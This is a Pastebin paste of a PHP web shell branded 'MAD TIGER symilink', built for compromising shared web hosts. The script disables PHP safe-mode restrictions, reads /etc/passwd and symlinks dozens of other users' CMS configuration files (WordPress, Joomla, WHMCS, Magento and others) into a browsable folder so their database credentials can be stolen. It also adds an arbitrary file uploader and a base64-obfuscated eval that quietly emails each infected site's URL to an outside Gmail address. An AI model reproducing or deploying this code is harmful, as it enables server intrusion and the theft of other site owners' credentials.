API tools faq
paste
madtiger

Sym

madtiger
Apr 19th, 2018
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.36 KB | None | 0 0
raw download clone embed print report
  1. <?php ?><?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('display_errors', 0);
  5. ?>
  6. <html>
  7. <head>
  8. <title>MAD TIGER</title>
  9. <style>
  10. body {
  11. text-align: center;
  12. font-size: 18px;
  13. font-weight:bold;
  14. font-family: Arial;
  15. color:gray;
  16. background-color: black;
  17. margin: 5px 5px 5px 5px;
  18. }
  19. input[type="submit"]{
  20. background: green;
  21. border-radius:6px;
  22. border: 1px solid lime;
  23. color:white;
  24. text-shadow: 0px 0px 10px rgba(0, 149, 255, 0.75);
  25. line-height:50px;
  26. padding-left:10px;
  27. padding-right:10px;
  28. text-transform:none;
  29. }
  30. #name{
  31. color: gray;
  32. font-size: 12px;
  33. }
  34. </style>
  35. </head>
  36. <body>
  37.  
  38. <font face="Comic Sans MS" color=red><center><h1>MAD TIGER symilink</h1></font>
  39. <?php
  40. $injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsKaWYgKCR2aXNpdGMgPT0gIiIpIHsKICAkdmlzaXRjICA9IDA7CiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKICAkd2ViICAgICA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsKICAkaW5qICAgICA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7CiAgJHN1YiAgID0gIk0zN1IhWCB1cGxvYWRlciBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7CiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IGJ5ICR2aXNpdG9yIC0gJGF1dGhfcGFzcyI7CiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgia2hheXJvbGxpbWFAZ21haWwuY29tIiwkc3ViLCRib2R5KTsgfQp9CmVsc2UgeyAkdmlzaXRjICA7IH0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs=";
  41. eval(base64_decode($injbuff));
  42. echo '<b>' . php_uname() . '<br></b>';
  43. echo $_SERVER['SERVER_SOFTWARE'];
  44. echo '<br>Safe Mode : ';
  45. $safe_mode = ini_get('safe_mode');
  46. if ($safe_mode == '1') {
  47. echo '<font color="red">ON</font>';
  48. } else {
  49. echo '<font color="green">OFF</font>';
  50. }
  51. echo '<br>';
  52. echo '</font>';
  53. $fp = fopen("php.ini", "w+");
  54. fwrite($fp, "safe_mode = OFF
  55. Safe_mode_gid = OFF
  56. disable_functions = NONE
  57. disable_classes = NONE
  58. open_basedir = OFF
  59. suhosin.executor.func.blacklist = NONE ");
  60. fclose($fp);
  61. if (empty($_POST['config'])) { ?><form method="POST"><textarea name="passwd" style="display:none;" class='area' rows='25' cols='80'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" value=" Click to make Symlink" type="submit"><br></form></center><br>$filename = $_SERVER[SCRIPT_FILENAME];
  62. touch/*;*/($filename, $time)
  63. <?php
  64. }
  65. if ($_POST['config']) {
  66. $function = $functions = @ini_get("disable_functions");
  67. if (eregi("symlink", $functions)) {
  68. die('<error>Symlink is disabled :( </error>');
  69. }
  70. @mkdir('mina', 0755);
  71. @chdir('mina');
  72. $htaccess = "
  73. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  74. Options Indexes FollowSymLinks
  75. ForceType text/plain
  76. AddType text/plain .php
  77. AddType text/plain .html
  78. AddType text/html .shtml
  79. AddType txt .php
  80. AddHandler server-parsed .php
  81. AddHandler txt .php
  82. AddHandler txt .html
  83. AddHandler txt .shtml
  84. Options All
  85. Options All";
  86. file_put_contents(".htaccess", $htaccess, FILE_APPEND);
  87. $passwd = $_POST["passwd"];
  88. $passwd = explode("
  89. ", $passwd);
  90. foreach ($passwd as $pwd) {
  91. $pawd = explode(":", $pwd);
  92. $user = $pawd[0];
  93. @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wordpress.txt');
  94. @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wordpress-wp.txt');
  95. @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wordpress-WP.txt');
  96. @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wordpress-wp-beta.txt');
  97. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wordpress-beta.txt');
  98. @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wordpress-press.txt');
  99. @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wordpress-wordpress.txt');
  100. @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wordpress-Wordpress.txt');
  101. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wordpress-blog.txt');
  102. @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wordpress-news.txt');
  103. @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wordpress-new.txt');
  104. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  105. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  106. @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  107. @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
  108. @symlink('/home/' . $user . '/public_html/db.php', $user . '-dbconf.txt');
  109. @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  110. @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  111. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-wp-test.txt');
  112. @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  113. @symlink('/home/' . $user . '/public_html/portal/configuration.php', $user . '-joomla-protal.txt');
  114. @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  115. @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  116. @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  117. @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  118. @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  119. @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  120. @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
  121. @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm15.txt');
  122. @symlink('/home/' . $user . '/public_html/central/configuration.php', $user . '-whm-central.txt');
  123. @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  124. @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  125. @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  126. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmcs.txt');
  127. @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support.txt');
  128. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  129. @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-whmcs2.txt');
  130. @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm.txt');
  131. @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-Whm4.txt');
  132. @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-Whm5.txt');
  133. @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-Whm6.txt');
  134. @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-Whm7.txt');
  135. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-Whm8.txt');
  136. @symlink('/home/' . $user . '/public_html/order/configuration.php', $user . '-Whm9.txt');
  137. @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  138. @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-Open_Cart.txt');
  139. @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-invisio.txt');
  140. @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  141. @symlink('/home/' . $user . '/public_html/connect.php', $user . '-8.txt');
  142. @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-mk-portale1.txt');
  143. @symlink('/home/' . $user . '/public_html/include/config.php', $user . '-12.txt');
  144. @symlink('/home/' . $user . '/public_html/settings.php', $user . '-Smf.txt');
  145. @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vBulletin1.txt');
  146. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-vBulletin2.txt');
  147. @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-vBul3-Phpbb2.txt');
  148. @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vBulletin4.txt');
  149. @symlink('/home/' . $user . '/public_html/inc/config.php', $user . '-mybb.txt');
  150. @symlink('/home/' . $user . '/public_html/config.php', $user . '-Config-Phpbb1.txt');
  151. @symlink('/home/' . $user . '/public_html/includes/functions.php', $user . '-phpbb3.txt');
  152. @symlink('/home/' . $user . '/public_html/opencart/admin/config.php', $user . '-Open_cart2.txt');
  153. @symlink('/home/' . $user . '/public_html/app/etc/config.xml', $user . '-Magento1.txt');
  154. @symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-Magento2.txt');
  155. @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  156. @symlink('/home/' . $user . '/public_html/drupal/sites/default/settings.php', $user . '-Drupal.txt');
  157. }
  158. echo '<b class="cone"><font face="Tahoma" color="LawnGreen" size="2pt"><b>Congratulation ==>> </b> <a target="_blank" href="mina"><font color="LawnGreen" size="2pt">Config list</a></font></b>';
  159. }
  160. echo '<br><br><br><br>';
  161. echo '**[ Uploader ]**';
  162. echo '<br><br>';
  163. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  164. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  165. if ($_POST['_upl'] == "Upload") {
  166. if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  167. echo '<b><font color="LawnGreen">Upload Successfully!!! </font></b><br><br>';
  168. } else {
  169. echo '<b><font color="red">Upload Failed!!! </b><br></font>';
  170. }
  171. }
  172. ?><br><br>
  173. <div id="name">&copy; <a href="https://www.facebook.com/khayrol.islam1" target="_blank">khayrol</a>. Coded & Modified By <a href="https://www.facebook.com/khayrol.islam1" target="_blank">MAD TIGER</a> & <a href="https://www.facebook.com/khayrol.islam1" target="_blank">!!!!</a></div>
  174. </body></html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!